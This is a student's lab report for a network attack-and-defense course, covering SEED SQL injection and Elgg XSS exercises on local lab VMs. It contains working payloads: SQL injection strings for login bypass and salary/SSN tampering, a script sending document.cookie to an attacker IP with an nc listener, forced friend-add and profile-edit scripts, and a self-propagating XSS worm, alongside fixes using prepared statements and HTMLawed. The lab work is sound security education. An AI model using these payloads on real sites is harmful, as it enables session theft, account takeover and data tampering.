目录
- 20232831 袁思承 2023-2024-2 《网络攻防实践》第10次作业
- 1.实验内容
- 2.实验过程
- (1)SEED SQL注入攻击与防御实验
- ①熟悉SQL语句
- ②对SELECT语句的SQL注入攻击
- ③对UPDATE语句的SQL注入攻击
- ④SQL对抗
- (2)SEED XSS跨站脚本攻击实验(Elgg)
- ①发布恶意消息,显示警报窗口
- ②弹窗显示cookie信息
- ③窃取受害者的cookies
- ④成为受害者的朋友
- ⑤修改受害者的信息
- ⑥编写XSS蠕虫。
- ⑦对抗XSS攻击。
- 3.学习中遇到的问题及解决
- 4.学习感悟、思考等
- 参考资料
20232831 袁思承 2023-2024-2 《网络攻防实践》第10次作业
1.实验内容
(1)SEED SQL注入攻击与防御实验
我们已经创建了一个Web应用程序,并将其托管在 三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:
1、熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。
2、对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。
3、对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
4、SQL对抗:修复上述SQL注入攻击漏洞。
(2)SEED XSS跨站脚本攻击实验(Elgg)
为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。
1、发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。
2、弹窗显示cookie信息:将cookie信息显示。
3、窃取受害者的cookies:将cookie发送给攻击者。
4、成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
5、修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。
6、编写XSS蠕虫。
7、对抗XSS攻击。
2.实验过程
(1)SEED SQL注入攻击与防御实验
①熟悉SQL语句
任务描述:
我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。
首先,我们使用以下命令,打开Ubuntu的阿帕奇apache2服务,并进行服务的状态查看:
sudo service apache2 start
sudo service apache2 status
成功启动后,我们在终端开始学习SQL语句,浅当复习本科学习过的各种数据库内容吧:
首先,打开数据库并使用root进行登录
mysql -u root -pseedubuntu
切换到Users权限,并查看所有的数据表,可以看到有两张表,Tables_in_Users和credential表
use Users;
show tables;
分别查看这两张表里面都是什么
select * from Tables_in_Users;
select * from credential;
结果发现第一张表不存在…猜测因为是系统的数据表,导致权限不够,或者确实不存在…
而第二张表中就是一张信息表,包含ID、姓名、EID、薪资、生日等等信息。
再随便输入几条SQL语句,熟悉一下SQL:
select * from credential where Name = 'Alice';
select * from credential where ID=1;
select * from credential where ID <=3 ;
②对SELECT语句的SQL注入攻击
上述Web应用存在SQL注入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。
首先,在自带的火狐浏览器中打开以下网址,这里出现了一个登录界面
http://www.seedlabsqlinjection.com/
很明显,我们刚刚查询的数据库内容中,密码明显被加密过,登录肯定会失败。让我们输入Alice账户和密码进行检验,登录不上,正常。
因此,我们需要查看源码。输入以下命令进行unsafe_home.php的源代码的查看:
vim /var/www/SQLInjection/unsafe_home.php
可以看到,密码是被哈希过的hashed_pwd,所以不知道密码的情况下,我们无法通过查询到的hashed_pwd进行登录。
因此,我们使用SQL注入攻击,实现登录。我们来分析这个登录使用的select语句
$sql = "SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,PasswordFROM credentialWHERE name= '$input_uname' and Password='$hashed_pwd'";
通过这个select语句我们可以知道,我们能输入以下内容进行sql注入。’ 单引号是为了终止当前的SQL语句,#是将后续的SQL语句注释。这样我们就能在SQL语句运行至WHERE name= ‘Alice’时被终止,且不用输入后续密码,直接就能成功运行这个SQL语句。
Alice'#
登陆成功!对selecrt语句的SQL注入攻击成功。
③对UPDATE语句的SQL注入攻击
通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
点击Edit Profile,发现只能修改以下内容:
于是,使用以下命令查看unsafe_edit_backend.php文件的源代码,检查Update SQL语句的内容,可以看到内容如下:
vim /var/www/SQLInjection/unsafe_edit_backend.php
我们仿照上述实验②的做法,进行SQL注入攻击,使用以下代码进行Alice的薪资和SSN号的修改,代码如下。同样的,’ 单引号表示SQL语句的中断,#表示SQL语句后续内容的省略:
', Salary='999999' where name='Alice'; #
', SSN='20232831' where name='Alice'; #
修改结果截图如下:
薪资修改成功,成功月入百万
这里发现,SQL注入随便放在任何一个文本框都可以实现,所以只要能够成功进行SQL注入,该SQL语句是否对应图中的修改框的修改位置,已经不重要了。
修改SSN号为我的学号,成功:
对UPDATE语句的SQL注入攻击实验结束,且试验成功。
④SQL对抗
修复上述SQL注入攻击漏洞。
我们可以观察php文件的源代码,可以发现,它们对SQL语句的数据和命令的判定并没有分开,而是混在一起,而数据库无法分清楚,这段SQL语句中哪段是用用户的数据,哪段又是SQL的命令。这就造成了SQL注入的发生,因此,我们用php语言中的bind_param方法来绑定参数,并用?来代替参数,这样就能修复SQL注入攻击漏洞。
对select的修复如下,我们需要使用以下代码替换掉SQL部分的代码,或者直接在上面修改即可:
$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?");
$sql->bind_param("ss", $input_uname, $hashed_pwd);
再次登录,发现失败,修复成功
对update的修复内容如下:
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);
再次修改:
点击Save后,一直卡在空白页面,可以发现Update对数据库的修改失败
文件的修改过程:
实验成功。
(2)SEED XSS跨站脚本攻击实验(Elgg)
①发布恶意消息,显示警报窗口
任务:
在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。
我们打开以下网站,并用从数据库中查询到的用户进行登录,除了Admin管理员意外,所有用户的登陆密码都是seed+用户名。
例如,Alice的密码就是seedalice,Samy的密码就是seedsamy,而Admin的密码是seedelgg。当然,用户Ted无法登录,通过Admin查询所有用户发现,他并没在这个网站注册过。
http://www.xsslabelgg.com
使用Alice账户登陆后,显示界面如下:
首先,我们点击Alice的头像下面的Edit profile
在Brief description输入以下XSS攻击代码,让系统给出警告信息。
<script> alert('xss');</script>
系统给出了警告信息:xss
②弹窗显示cookie信息
任务:将cookie信息显示。
我们将xss攻击内容改成以下内容
<script> alert(document.cookie);</script>
再次进入Alice主页,系统展示cookie信息如下:
③窃取受害者的cookies
任务:将cookie发送给攻击者。
首先,我们查看当前SeedUbuntu的IP:
查询得知,为192.168.200.3,因此,我们构造以下代码:
通过以下代码,将受害者Alice的cookies发送给攻击者Boby。代码将受害者Alice的cookie放入document.write,并发送给攻击者Boby。且端口号设置为了500,此后我们要监听这个端口,从而获取受害者的cookies
<script>document.write('<img src=http://192.168.200.3:500?c='+escape(document.cookie) + ' >');</script>
这就要求我们将以下代码放在攻击者Boby的Brief description中,然后再登录受害者Alice的账户,用Alice访问Boby。
首先,登录Boby,并用以下命令修改Brief description:
<script>document.write('<img src=http://192.168.200.3:500?c='+escape(document.cookie) + ' >');</script>
输入以下命令监听端口500,然后用Alice访问Boby后,从而获取到了cookies
nc -l 500 -v
使用Alice账户,搜索并访问Boby
成功访问Boby,且成功获取受害者Alice的cookies
实验结束。
④成为受害者的朋友
任务:
使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
首先,我们观察一下添加朋友的过程:
我们使用Alice添加Boby为好友,同时,按下F12打开浏览器的开发者工具,查看添加好友过程中发出了什么信息:
可以看到,出现了一个POST请求,我们详细分析一下这个请求:
http://www.xsslabelgg.com/action/friends/add?friend=45&__elgg_ts=1715781954&__elgg_token=FXR_Mu08DjK8eIZqjnK6sg
从图中这个request url信息可知,post的参数分别为
friend=?,__elgg_ts=?,__elgg_token=?
因此,我们可以通过以下使用js程序代码,获取这仨个参数,并通过url直接强行加好友,无需对方点击“添加好友”按钮。
<p><script type="text/javascript">window.onload = function () {var Ajax = null;var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;var token = "&__elgg_token=" + elgg.security.token.__elgg_token;var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;
Ajax = new XMLHttpRequest();
Ajax.open("GET", sendurl, true);
Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Ajax.send();
}</script></p>
于是,在Alice的About me栏中添加这段代码。(注意,这里必须点击About me框右上角的edit html,才可以进行添加这段代码,否则添加不成功)
切换Samy账户,首先可以看到,我们并没有任何一个好友。
访问Alice的主页,就会发现自动添加了Alice为好友,甚至Alice自己与自己也添加了好友,这是非常离谱的操作。
使用js程序加受害者为朋友,试验成功!
⑤修改受害者的信息
任务:
使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。
与第④个实验相同,这里也是修改Alice的about me,从而实现受害者被添加资料。
首先,查看修改资料的日志,根据日志,使用以下代码构造js程序
根据F12的信息,可以得知,构造js程序如下:
<script type="text/javascript">window.onload = function(){var userName=elgg.session.user.name;var guid="&guid="+elgg.session.user.guid;var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;var token="&__elgg_token="+elgg.security.token.__elgg_token;var content= token + ts + "name=" + userName + "&description=<p>hhh,20232831ysc is here!</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;var sendurl = "http://www.xsslabelgg.com/action/profile/edit"var samyGuid=44;if(elgg.session.user.guid!=samyGuid){var Ajax=null;Ajax=new XMLHttpRequest();Ajax.open("POST",sendurl,true);Ajax.setRequestHeader("Host","www.xsslabelgg.com");Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");Ajax.send(content);}}
</script>
使用Samy访问Alice,发现主页被修改
访问Alice后,主页被修改截图如下:
js程序修改受害者主页完成!
⑥编写XSS蠕虫。
任务:编写XSS蠕虫
根据上述实验的经验,编写蠕虫代码如下,这段代码实现的功能与⑤类似,也是修改受害者主页,但是能够在受害者之间传播,而不用必须访问攻击者的主页,访问了受害者的主页,你也会变成下一个受害者,具有传染性:
<script id="worm" type="text/javascript">window.onload = function(){var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";var jsCode = document.getElementById("worm").innerHTML;var tailTag = "</" + "script>";var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);var userName=elgg.session.user.name;var guid="&guid="+elgg.session.user.guid;var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;var token="&__elgg_token="+elgg.security.token.__elgg_token;var content= token + ts + "&name=" + userName + "&description=<p>zhe li shi 20232831ysc"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;var sendurl = "http://www.xsslabelgg.com/action/profile/edit"var samyGuid=44;if(elgg.session.user.guid!=samyGuid){var Ajax=null;Ajax=new XMLHttpRequest();Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");Ajax.send(content);}}</script>
同样,将其放入Alice的About me,然后用Boby去访问Alice,用Samy访问Boby,观察感染情况:
Boby账户访问Alice后
Samy账户访问Boby后
发现传染性!蠕虫构造成功!
⑦对抗XSS攻击。
对抗XSS攻击有以下方法:
1、输入验证和 sanitization
验证用户输入:确保用户输入的验证和sanitization,以防止恶意代码被注入。
使用白名单方法:只允许特定的、可靠的输入被处理,并拒绝所有其他输入。
使用sanitizer库:使用可靠的sanitizer库来清洁和sanit化用户输入。
2、输出编码
HTML转义:使用HTML转义来防止恶意代码被执行。
使用安全的编码方案:使用安全的编码方案,例如HTML实体编码或Unicode编码。
3、内容安全策略(CSP)
定义CSP策略:定义CSP策略以指定哪些内容来源被允许在网页中执行。
使用CSP头:使用CSP头来定义策略并强制执行。
4、HTTPOnly Cookies
设置HTTPOnly标志:在Cookie中设置HTTPOnly标志,以防止JavaScript访问它们。
还有很多方法 ,这里我们用Web网页内部的HTMLawed进行对抗攻击。
HTMLawed是一个PHP库,它可以帮助防止XSS(跨站脚本攻击)攻击通过过滤和sanitizing HTML输入。
方法如下:
首先,我们登录管理员账户Admin
从Account进入Administration管理员界面
点击Plugins
点击Activate,将HTMLawed激活
激活后,重新进行XSS攻击实验,例如,这里重新进行修改受害者主页信息的XSS攻击,就会发现,XSS攻击已经失效。对抗XSS攻击成功!
即,重新让Samy访问Alice,发现无法进行主页修改。
XSS对抗成功。
3.学习中遇到的问题及解决
- 问题1:About me框添加js程序代码失败
- 问题1解决方案:需要打开About me框右上角的edit html模式,否则Visual editor模式下是无法保存js程序代码的。
4.学习感悟、思考等
通过本次实验,我学习了SQL注入、Web渗透,蠕虫病毒等等相关知识,让我明白了网络安全隐患无处不在,不仅企业需要严防数据库安全问题,我们每一位网民也需要小心访问Web页面,以防出现Web方面的XSS攻击或者被蠕虫病毒感染。
参考资料
- Chatgpt
